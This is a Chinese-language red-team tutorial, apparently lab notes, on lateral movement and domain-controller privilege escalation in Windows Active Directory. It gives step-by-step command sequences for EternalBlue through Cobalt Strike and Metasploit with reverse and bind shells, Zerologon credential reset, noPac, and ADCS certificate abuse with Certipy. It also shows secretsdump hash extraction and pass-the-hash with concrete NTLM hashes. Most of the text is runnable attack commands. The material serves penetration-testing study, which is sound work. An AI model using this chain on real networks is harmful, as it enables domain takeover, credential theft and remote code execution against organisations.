【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

简介: 【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Kerberos_TGS,GPO&DACL,域控提权,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。


横向移动-系统-CVE-2017-0146(永恒之蓝)

CVE-2017-0146(MS17010)


影响版本

Windows 7 8.1 10; Windows Server 2008 2012 2016


插件检测-横向移动

CS联动MSF-检测&利用

cs(各种插件)只支持检测,不支持利用,所以将新建一个会话移交给msf进行进一步的利用

1、CS创建外联监听器


2、CS执行联动MSF

也可以手工在cs输入命令

spawn back_msf

3、MSF监听联动配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8787
run

4、添加路由

run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表


5、检测模块(检测是否存在永恒之蓝)

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //设置扫描目标段
set threads 5 //设置扫描线程数
run


6、利用模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标   #set rhosts 192.168.3.21-32 //设置扫描范围,批量检测与利用
run


横向移动-域控提权-CVE-2020-1472(NetLogon)


背景

未经身份验证的攻击者只需要能访问域控的135端口即可通过NetLogon远程协议连接域控并重置域控机器账户的hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限),进而接管整个域


原理

NetLogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。通过认证后,调用NetLogon协议中RPC函数NetrServerpasswordSet2来重置域控机器账户的Hash,进而接管全域


影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows

Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core

installation) Windows Server 2012 Windows Server 2012 (Server Core

installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server

Core installation) Windows Server 2016 Windows Server 2016 (Server

Core installation) Windows Server 2019 Windows Server 2019 (Server

Core installation) Windows Server, version 1903 (Server Core

installation) Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)


poc检测:

https://github.com/SecuraBV/CVE-2020-1472.git

exp重置域账号密码:

https://github.com/blackarrowsec/redteam-research

https://github.com/dirkjanm/CVE-2020-1472


恢复密码:

https://github.com/risksense/zerologon

https://github.com/SecureAuthCorp/impacket


0、获取计算机名:

nbtscan -v -h 192.168.3.21

1、连接DC清空凭证:

proxychains python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

2、获取域内HASH:

proxychains python3 secretsdump.py OWA2010CN-GOD\$@192.168.3.21 -just-dc -no-pass

3、连接域控PTH

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21


4、后续恢复密码:


横向移动-域控提权-CVE-2021-42287

前提条件

一个域内普通账号与密码

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user


影响版本

Windows基本全系列(未打补丁)


python版本EXP

https://github.com/WazeHell/sam-the-admin


利用过程

windows下(貌似不能使用):报错 ‘KRB5CCNAME’ 不是内部或外部命令,也不是可运行的程序

或批处理文件。


看了下github项目详情 只能在kali下运行

等了两年都没有再更新了……

kali下:这里的kali是22年版本,靶机也是之前的god.org中的DC,旨在使用域内普通用户账号利用漏洞获得域控DCsystem权限。当然还是需要使用代理

C#版本EXP

项目地址:https://github.com/cube0x0/noPac


利用过程:

1、使用代理后:

修改Host绑定域名和IP

2、扫描探针:

noPac scan -domain god.org -user webadmin -pass admin!@#45

3、利用连接:

noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd


横向移动-域控提权-CVE-2022-26923(ADCS攻击)

项目地址:https://github.com/ly4k/Certipy

Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。


概述

当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。


影响

Win8.1、Win10、Win11、WinServer2012R2、WinServer2016、WinServer2019、WinServer2022等版本


前提条件

1、一个域内普通账号

2、域内存在证书服务器


DC没有安装Active Directory证书服务

DC已安装Active Directory证书服务


Kali添加访问域内信息 /etc/hosts

192.168.3.130 xiaodi.local

192.168.3.130 xiaodi-WIN-3C7SS32SQ6R-CA

192.168.3.130 WIN-3C7SS32SQ6R.xiaodi.local


获取CA结构名和计算机名

certutil -config - -ping


域内信息

192.168.1.15

test Pass123

xiaodi-WIN-3C7SS32SQ6R-CA

WIN-3C7SS32SQ6R.xiaodi.local


1、申请低权限用户证书:

1、申请低权限用户证书:

certipy req 'xiaodi

2、检测证书

certipy auth -pfx test.pfx

3、创建一个机器账户:

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 addComputer pwnmachine 'CVEPassword1234*'

4、设置机器账户属性(dNSHostName和DC一致):

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'


5、再次申请证书:

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.130' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

6、检测证书:

certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.3.130


7、导出HASH:

python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4


8、利用HASH:

python3 wmiexec.py xiaodi.local/administrator@192.168.3.130 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd


相关文章
|
7月前
|
Shell 数据安全/隐私保护 Windows
MSF永恒之蓝使用
MSF永恒之蓝使用
80 0
|
安全 网络协议 Shell
|
SQL 开发框架 安全
记一次H站渗透以及提权
这个网站所使用的程序是一套自助交换友情链接的ASP脚本程序 直链王.
|
安全 网络安全 虚拟化
windows10永恒之黑漏洞复现
windows10永恒之黑漏洞复现
2248 0
|
存储 安全 Java
NukeSped“后门”重现!朝鲜黑客组织 Lazarus 利用 Log4j 漏洞攻击 VMware Horizon 服务器
NukeSped“后门”重现!朝鲜黑客组织 Lazarus 利用 Log4j 漏洞攻击 VMware Horizon 服务器
405 0
|
安全 网络安全
金山网络两月被黑4次 入侵黑客留名挑衅
国内知名安全公司金山网络近期频繁遭受黑客“光顾”。8月22日20点,金山网络旗下金山手机卫士的主页被黑客篡改;不到一日的8月23日上午9时30分,金山网络官网又被黑客攻破。若加上此前两次被黑客成功入侵,金山网络两个多月来连续4次被黑。
1430 0
|
监控 安全
防范自动连接国外黑客服务器的“古董”病毒
上海计算机病毒防范服务中心预警,近期一种名为“古董感染虫变种”的危险病毒在网上爆发,用户电脑一旦被感染,该病毒会自动连接国外黑客服务器,对系统安全和个人资料产生威胁,计算机用户需严加防范。 据介绍,这是一种感染型病毒,它能对可执行文件和脚本文件进行感染,然后执行远程控制与自动访问网站的任务。
939 0
|
安全 测试技术 网络安全
微软EternalBlue永恒之蓝漏洞攻击测试
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256 声明:仅供学习交流使用,个人实验笔记。
1662 0
|
Linux 数据安全/隐私保护 Shell